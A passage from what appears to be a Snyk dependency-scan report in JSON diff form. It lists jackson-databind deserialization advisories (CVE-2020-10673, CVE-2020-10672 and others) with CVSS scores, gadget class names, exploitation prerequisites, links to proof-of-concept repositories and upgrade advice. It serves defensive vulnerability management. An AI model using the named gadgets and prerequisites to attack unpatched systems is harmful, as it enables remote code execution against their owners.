"NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:45.907430Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.caucho.config.types.ResourceRef` (aka `caucho-quercus`).\r\n\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2660)\n- [On Jackson CVE's Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-10673)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10673" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-fqwf-pjwf-7vqv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T14:36:02.644920Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:21Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.167932Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2659", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVEs: Don’t Panic" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:35.299190Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory` (aka `aries.transaction.jms`). \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2659)\n- [On Jackson CVEs: Don’t Panic](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10672" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-95cm-88f5-f2c7" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T15:03:20.847507Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:24Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.920721Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2642", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.137266Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `javax.swing.JEditorPane`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2642)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10969" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-758m-v56v-grj4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-26T16:25:31.113677Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-26T14:55:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:31Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.582959Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2662", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.826605Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `org.aoju.bus.proxy.provider.remoting.RmiProvider` (aka bus-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2662)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-rf6r-2c4q-2vwg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-26T17:09:01.709397Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-26T14:55:20Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:20Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.576513Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2670", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-11113", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:47.400473Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:21.749219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.400473Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.openjpa.ee.WASRegistryManagedRuntime` (aka openjpa).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the 